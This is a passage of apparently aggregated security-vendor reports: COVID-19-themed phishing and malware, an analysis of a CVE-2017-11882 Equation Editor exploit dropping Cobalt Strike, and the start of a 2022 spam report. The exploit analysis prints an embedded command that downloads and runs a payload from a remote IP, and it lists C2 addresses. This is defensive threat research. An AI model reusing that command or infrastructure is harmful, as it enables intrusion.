Compromise (IOC)\u2019s, this report covers the key behaviors by aligning to the MITRE ATT&amp;CK Framework. \n\n[_MITRE ATT&amp;CK_](<https://attack.mitre.org/>)_ launched in 2018 is a security framework that describes the various stages through which an attack will generally progress. The intent of the framework is to provide \u201cbetter detection of post-compromise cyber adversary behavior\u201d_. _This framework is gaining increased adoption in the security community and VMware Carbon Black actively maps our products to this framework to provide added context for our customers._\n\nPhishing emails are the primary source, which in turn manifest into harmful threats that include malicious attachments that deliver payloads to infect victim machines. Some recently observed payloads are delivering trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. In one variant that was analyzed, the malware was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. These recent observations show an increased overall risk to corporate as well as personal security, at a time where many countries and corporations are enforcing remote working. \n\n## **Background**\n\nThe COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown leading to a climate of uncertainty. Unfortunately during times of uncertainty and doubt, threat actors are ready to take advantage of the widespread desire to be informed. This is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and on overload with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, simply by using luring tactics that feature Coronavirus themed malware. \n\nWhile this technique isn\u2019t new, history has proven that cyber crime often increases during times of heightened emotion, distraction and stress, such as certain religious or [festive](<https://www.bleepingcomputer.com/news/security/emotet-trojan-is-inviting-you-to-a-malicious-christmas-party/>) holidays, [elections](<https://www.darkreading.com/attacks-breaches/trump-themed-malware-dominating-threat-campaigns-this-election-season/d/d-id/1327211>), and even [Black Friday](<https://www.infosecurity-magazine.com/news/fake-black-friday-apps-cause/>) sales events. The actors exploit these challenging times to find avenues for distributing their malware. \n\nThis article aims to increase awareness of recently observed threats that are leveraging the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&amp;CK Framework. MITRE ATT&amp;CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the MITRE ATT&amp;CK Framework is important as there is a growing number of IOC\u2019s being produced daily. HIstorically, such as in the case of Emotet, handling such large volumes of IOC\u2019s can become overwhelming for defenders. Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense. \n\nThe intent is to raise awareness for customers, SOC teams, IR partners, MSSPs and all defenders out in the InfoSec community, and to aid them with detection, protection and response of such malware we will be examining the types of attacks that appear to be most common.\n\nFor further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: [Cybersecurity Community Resources](<https://www.carbonblack.com/2020/03/17/covid-19-cybersecurity-community-resources/>) page. \n\n## **Technical Analysis**\n\nIn the following section we will focus on the first two phases of the MITRE ATT&amp;CK framework: **Initial Access** and **Execution**. We focus on these phases because we have observed the largest overlap from multiple actors that we are tracking. VMware Carbon Black\u2019s Threat Analysis Unit will continue to follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.\n\nBefore we introduce these two tactic categories we would like to specifically highlight one of the most frequently leveraged techniques. [Masquerading (T1036)](<https://attack.mitre.org/techniques/T1036/>) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. It is one of the key techniques employed in many of the observed threat types. While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. Similar to campaigns that target religious or festive holidays, masquerading is the perfect tactic used by the bad actors, who have no regard for their victims. Their mission is clear, and masquerading helps them to evade defenses and get a few steps closer to achieving their goals. \n\n## **Initial Access **\n\nThis is the first tactic employed by bad actors whose hopes are to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information related to COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps, as well as fake software. The intent is to catch the end user off guard in order to deliver the malware. Other tactics could also include [drive-by compromise (T1189)](<https://attack.mitre.org/techniques/T1189/>) or [supply chain compromise (T1195)](<https://attack.mitre.org/techniques/T1195/>). The rationale behind this is due to the rapid registration of coronavirus themed domain names that have appeared on [MalwarePatrol.net](<https://www.malwarepatrol.net/>). The count at the time of writing is currently over 5000 registered domain names. Using Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites and becoming subject to drive-by or supply chain compromise. The list can be found [here](<https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt>). \n\n### [**Spearphishing Attachment - TID:T1193**](<https://attack.mitre.org/techniques/T1193/>)\n\nAttachments are a popular choice for obtaining initial infection. Observed attachment file types include, but are not limited to files with the following extensions: ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC, XLS. Examples of phishing emails may contain spoofed email headers and authentic messaging to lure the victim into a false sense of security. Attachment names observed also include names that are attention grabbing in order to arouse enough curiosity for the end user to feel the need to open it. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. With that said, more advanced threat actors will be particularly good at producing an authentic looking email message, as we will see later in this report. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/1-Phishing-email-example-1.png>) \n\n\n**Figure 1: Phishing email example containing malicious Word document attachment**\n\nA common technique is to create interesting content for malicious Microsoft Office related email attachments in order to convince the user to click on a link.. This typically will invoke the underlying malicious code embedded within the document, which is usually a malicious MS Office macro using VBA code. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/2-Phishing-email-example-1-Word-macro.png>) \n\n\n**Figure 2: Typical end-user prompt to trigger embedded payload**\n\nIn our next example we see an ISO file included as an attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/3-Phishing-email-example-2.png>) \n\n\n**Figure 3: Phishing email example containing malicious ISO file attachment**\n\nThe ISO attachment contains a SCR file which is actually a PE file. When executed, the PE file deploys RemCos, a prolific RAT which is being continually updated and sold on the Dark Web. The flow diagram shown below shows a visual representation of the underlying effects of opening this particular email attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/4-CBD-Flow-SCR.png>) \n\n\n**Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard**\n\nIn the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/5-PDF-attachment-example-1.png>) \n\n\n**Figure 5: Example PDF Attachment containing clickable link**\n\nIf the user clicks the link within the PDF, they are presented with a fake Office365 landing page masquerading as a legitimate Office365 page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/6-PDF-attachment-fake-Office-365-page.png>) \n\n\n**Figure 6: Fake Office365 landing page**\n\nAfter the user clicks on the \u201cdownload file\u201d button, they are presented with a fake Office365 login prompt which harvests any details inputted by the end user. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/7-PDF-attachment-fake-Office-365-creds.png>) \n\n\n**Figure 7: Fake Office365 login prompt**\n\nIn the next example an attachment named **ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z** contains an executable, which when opened deploys **AgentTesla**. AgentTesla is used by threat actors to record keystrokes and other sensitive information, and to receive them via their C2 channel. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/8-7z-example.png>) \n\n\n**Figure 8: 7z file containing executable**\n\nAnother example uses an attachment name **AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe **which when opened, launches [RegAsm (T1121)](<https://attack.mitre.org/techniques/T1121/>) to deliver **Lokibot**, another popular and highly effective information stealer. This attachment contains an embedded AutoIT script to deliver the main payload. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/9-AutoIT-obfuscated-script.png>) \n\n\n**Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file**\n\nAnother attachment named COVID-19.INFO.37842702.doc installs a trojan, by leveraging [PowerShell (T1086)](<https://attack.mitre.org/techniques/T1086/>) and CSCRIPT (a technique used for [signed script proxy execution (T1216)](<https://attack.mitre.org/techniques/T1216/>)) to launch a VBS file which is a common [scripting (T1064)](<https://attack.mitre.org/techniques/T1064/>) technique. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/10-trojan-example.png>) \n\n\n**Figure 10: Execution path displayed within VMware Carbon Black EDR**\n\n## Execution\n\n[User execution (T1204)](<https://attack.mitre.org/techniques/T1204/>) is symptomatic of when an end user opens a phishing email or attachment. There are other specific TTP\u2019s that have been observed with the execution of Coronavirus themed payloads. \n\n### [Powershell (T1086):](<https://attack.mitre.org/techniques/T1086/>)\n\nWhen a particular MS Word document attachment named \u201c**CORONA VIRUS REMEDY ISREAL.doc**\u201d is opened, executed an obfuscated command within a hidden PowerShell window. This in turn invokes two signed Microsoft binaries: **csc.exe** and **cvtres.exe**, which are commonly seen in the defense evasion, [compile after delivery (T1500)](<https://attack.mitre.org/techniques/T1500/>) tactic. These types of behaviours are commonly seen in commodity malware, and are highly effective at delivering and compiling a payload using legitimate Windows binaries. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/11-Powershell-snippet.png>) \n\n\n**Figure 11: Snippet of obfuscated Powershell command**\n\n### [Dynamic Data Exchange (T1173):](<https://attack.mitre.org/techniques/T1173/>)\n\nMalicious MS Office documents still manage to successfully exploit unpatched versions of MS Office due to the typical DDE vulnerabilities. Some of these common CVE\u2019s are: [CVE-2012-0158](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027#mscomctlocx-rce-vulnerability---cve-2012-0158>), [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>). \n\nIn a recent Coronavirus themed MS Word document attachment, MS Word is the target for [exploitation for client execution (T1203)](<https://attack.mitre.org/techniques/T1203/>) using DDE exploits to launch the MS Equation Editor. The purpose is to deliver and execute a [signed binary proxy execution (T1218)](<https://attack.mitre.org/techniques/T1218/>), which in this instance was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. The VMware Carbon Black TAU team is still investigating this particular threat.\n\n## **More on Masquerading**\n\nMasquerading has been highlighted so far in relation to malicious phishing email attachments. Unfortunately third party software is not excluded from this. There is evidence to suggest that the following categories of software are being weaponised in order to target potential victims. \n\n### Fake VPN clients/installers:\n\nA recent [report](<https://www.bleepingcomputer.com/news/security/azorult-malware-infects-victims-via-fake-protonvpn-installer/>) highlights the fact that while many people globally adapt to working from home for the foreseeable future, there is a growing number of fake VPN clients and installers that are disguised as malware. The example discussed in the report delivers the AZORult malware via a fake ProtonVPN client, whereby post-execution the victim machine becomes part of the AZORult botnet. \n\n### Remote meeting software:\n\nTAU are currently monitoring for the appearance of weaponized or fake remote meeting software. TAU are anticipating that there may be an eventual increase over the coming weeks as more people around the world rely on remote working. \n\n### Mobile apps:\n\nAvast have recently [released](<https://www.apklab.io/covid19>) a repository for researchers and defenders due to the growing number of apps that have appeared for Android users. In a recent [report](<https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware>), a fake Android Coronavirus app was discovered to be delivering ransomware. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/12-fake-mobile-apps.png>) \n\n\n**Figure 12: Snippet showing potential malicious and fake apps**\n\n### Fake Coronavirus maps:\n\nIn a report published recently, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/13-Coronavirus-map.png>)\n\n**Figure 13: Malicious fake Coronavirus map **\n\n## **Ransomware**\n\n[Data encrypted for impact (T1486)](<https://attack.mitre.org/techniques/T1486/>) is observed with a new family of ransomware known as Coronavirus which was recently [reported](<https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/>). TAU has observed an upwards trend in ransomware for some time now, but sadly there has never been a better time for the threat actors to create and distribute ransomware. Ransomware is an ongoing and continual threat which TAU observes very closely. A full write up will be published soon on this new ransomware campaign. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/14-Coronavirus-ransomware.png>) \n\n\n**Figure 14: Coronavirus ransomware message**\n\n## **Summary**\n\nThe threats that we are seeing that leverage the COVID-19 pandemic are varied, but primarily familiar. The key here is that the uncertainty and thirst for knowledge about the global pandemic, coupled with the response of working remotely, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. While some public lists containing IOC\u2019s do exist, the current global situation could result in a significant increase in cyber attacks. The jump in IOC\u2019s may shortly become unmanageable. Understanding the behaviors, and leveraging the MITRE ATT&amp;CK Framework will help to detect and mitigate such threats. While Coronavirus themed malware includes a variety or different threats,many of the techniques are seen with regular commodity based malware. As ever, a layered approach should be taken to reduce the risk of such threats. Defenders should be extra vigilant in not only staying up to date with future Coronavirus related threats, but also advising their family, friends and colleagues of such threats. \n\n## **Indicators of Compromise (IOC\u2019s)**\n\nPlease refer to the VMware Carbon Black TAU [Github](<https://github.com/carbonblack/tau-tools/tree/master/threat_hunting/IOCs/COVID-19%20Post%20IOCs>) page for a list of IOC\u2019s.\n\nThe post [Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets &amp; Ransomware](<https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {}, "published": "2020-03-19T20:48:06", "type": "carbonblack", "title": "Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0798"], "modified": "2020-03-19T20:48:06", "id": "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756", "href": "https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-22T20:03:27", "description": "On November 20, 2017 the exploit for [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) was publicly released, which allowed for code execution in vulnerable versions of Microsoft\u2019s Equation editor. \n\nCVE-2017-11882 affects the following versions of Microsoft Office:\n\n * Microsoft Office 2007 Service Pack 3\n * Microsoft Office 2010 Service Pack 2\n * Microsoft Office 2013 Service Pack 1\n * Microsoft Office 2016 \n\n[Microsoft Equation Editor,](<https://support.office.com/en-us/article/Equation-Editor-6eac7d71-3c74-437b-80d3-c7dea24fdf3f>) which is a Microsoft Office component, contains a stack buffer overflow that allows remote code execution on a vulnerable system. Microsoft Equation Editor is an out-of-process COM server that is hosted by eqnedt32.exe. \n\nDEP and ASLR should protect against such attacks, however, because of the manner in which eqnedt32.exe was linked, it will not utilize these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to eqnedt32.exe, unless applied system-wide. This provides the attacker with a avenue to lure targets into clicking on a specially crafted documents, resulting in the ability to execute an embedded attacker command. \n\n> In the sample analyzed, ultimately a Cobalt Strike payload was dropped on the compromised system. However as the exploitation of this CVE continues to gain traction, practitioners can expect other families to be used. \n> \n> The Carbon Black Threat Analysis Unit (TAU) expects this vulnerability to be actively exploited in both spam and spearphishing campaigns, over the next quarter. \n> \n> The graphic below highlights the overall process, which is detailed in the technical analysis section.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2017/11/Figure_1.jpg>)\n\n_Figure 1: Process Overview_\n\nTechnical analysis of a sample utilizing CVE-2017-11882 is detailed in the below. The Carbon Black TAU created a [separate document for customers](<https://community.carbonblack.com/community/resources/threat-research/blog/2017/11/22/tau-tin-cve-2017-11882>), which details how they can utilize Carbon Black products to protect themselves against this type of attack.\n\n# Technical Analysis\n\n### **Malicious Document - Stage One**\n\nFile Name : \u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432\u0438\u043b \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u043e\u0432.rtf \nFile Name 1 : account details.rtf \nFile Name 2 : news.swift.rtf \nFile Size : 31,811 \nCRC32 : c326285e \nMD5 : f360d41a0b42b129f7f0c29f98381416 \nSHA1 : 245b867e578e9df12877df07017338863a5fdc59 \nSHA256 : 17f9db18327a29777b01d741f7631d9eb9c7e4cb33aa0905670154a5c191195c \n \n--- \n \n_Table 1: Sample metadata_\n\nThe initial document contains a malicious equation that exploits the [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) vulnerability. The exploit allows a crafted document to execute a command (with a maximum length of 44 bytes) via a call to the WinExec API. This exploit was released and documented in [this post](<https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about>). The command will call cmd.exe to download and execute a payload from a remote system, which is displayed in the table below.\n\nOffset 0 1 2 3 4 5 6 7 8 9 A B C D E F\n\n00000940 0A 0A 01 08 5A 5A 63 6D 64 20 2F 63 20 ZZcmd /c \n00000950 73 74 61 72 74 20 5C 5C 31 33 38 2E 36 38 2E 32 start \\\\\\138.68.2 \n00000960 33 34 2E 31 32 38 5C 77 5C 77 2E 65 78 65 20 26 34.128\\w\\w.exe &amp; \n00000970 41 41 41 41 41 12 0C 43 AAAAA C \n \n--- \n \n_Table 2: Embedded Command_\n\nIt should be noted that the payload in this document matches (with the only differences being the command itself) the object_data template and object_trailer from a [Proof of Concept for CVE-2017-11882](<https://github.com/embedi/CVE-2017-11882/blob/master/webdav_exec_CVE-2017-11882.py>).\n\n### **Dropper - Stage Two**\n\nStage two of the attack chain contains a dropper with the final payload as a resource. The dropper is wrapped in a custom packer and then wrapped again in UPX. Once through the packers, the dropper prepares the third stage of the chain by finding it in the binary resource section as C132\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2017/11/Figure_2.jpg>)\n\n_Figure 2: Load Resource_\n\nNext, the dropper searches for wmplayer.exe in the expected 32 and 64-bit locations.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2017/11/Figure_3.jpg>)\n\n_Figure 3: wmplayer.exe search_\n\nWmplayer.exe is created as a suspended process and the stage three DLL is injected into it and instructed to run. Finally, the dropper executes a command to delete the stage two dropper and exits.\n\ncmd.exe /C Del &lt;path_to_original_dropper&gt; \n \n--- \n \n_Table 3: Clean up command_\n\n### **Backdoor - Stage Three**\n\nThe final stage is a Cobalt Backdoor that connects back to the C&amp;C server at:\n\n * https://104.144.207.207\n * /j.ad\n * /submit.php\n * User-Agent\n * Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)\n\nThis final payload allows the attacker full control over the system. The backdoor is capable of executing arbitrary command from the C2 server as well as injecting additional payloads into memory using the ReflectiveLoader export of the DLL.\n\n# Conclusion\n\nSpam campaigns do their best to take advantage of the latest and most modular types of attacks, using the most recent vulnerabilities in order to maximize their effectiveness against the largest amount of targets. The Carbon Black TAU is constantly monitoring the threat landscape in order to provide the community and our customers with the latest trends and IOCs to increase security across the board. \n\nIn order to decrease the likelihood of infection, everyone should ensure that the latest security updates are installed and users should not open suspicious documents that they are not expecting. \n\n# Indicators\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**Context** \n \n---|---|--- \n \n138.68.234.128\n\n| \n\nIP\n\n| \n\nPayload Delivery Server \n \n104.144.207.207\n\n| \n\nIP\n\n| \n\nCommand and Control Server \n \nd46df9eacfe7ff75e098942e541d0f18\n\n| \n\nMD5\n\n| \n\nPayload (w.exe) \n \n60656140e2047bd5aef9b0568ea4a2f7c8661a524323111099e49048b27b72c7\n\n| \n\nSHA256\n\n| \n\nPayload (w.exe) \n \n86d739651881c01cfe5ce6867df3025a\n\n| \n\nMD5\n\n| \n\nCobalt Strike (final) Backdoor \n \n5f777cbad221cb2d89c59ff84ced2fd278d6d220c3cfc13e3fb8e2ca38698e0f\n\n| \n\nSHA256\n\n| \n\nCobalt Strike (final) Backdoor \n \n \n\nThe post [Threat Analysis: Equation Equals Backdoor](<https://www.carbonblack.com/2017/11/22/threat-analysis-exploit-allows-for-code-execution-in-vulnerable-versions-of-microsofts-equation-editor/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-22T18:50:11", "type": "carbonblack", "title": "Threat Analysis: Equation Equals Backdoor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2017-11-22T18:50:11", "id": "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "href": "https://www.carbonblack.com/2017/11/22/threat-analysis-exploit-allows-for-code-execution-in-vulnerable-versions-of-microsofts-equation-editor/", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year&#x27;s resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the &quot;preview&quot;, the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost closed. Vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organization to profit from victims&#x27; personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were offered to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the &quot;charity&quot; found the victim&#x27;s telephone number in a database of individuals affected by COVID-19. Those who wished to receive the &quot;aid&quot; were asked to state their full name, contact details, date of birth, social security and driver&#x27;s license numbers, gender, and current employer, attaching a scanned copy of their driver&#x27;s license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others&#x27; personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers&#x27; interest in wallet owners&#x27; accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. By getting the user&#x27;s secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The &quot;giveaways&quot; were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia thirty-year anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the &quot;giveaways&quot;. Users were offered to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that &quot;financial assistance&quot; is frequently promised by con artists to swindle you out of your money.\n\n&quot;Promotional campaigns by major banks&quot; were a popular bait in 2022. Visitors to a fraudulent web page were offered to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. The cybercriminals used an array of techniques to lull victims&#x27; vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar &quot;campaigns&quot; were staged in the name of other types of organizations, for example, the Polish finance ministry.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)\n\nAid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a &quot;Ramadan Relief&quot; program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, whereas observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization&#x27;s logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive &quot;recipient feedback&quot; posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts\u2014nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. In addition to that, they might ask the victim to cover the &quot;shipping 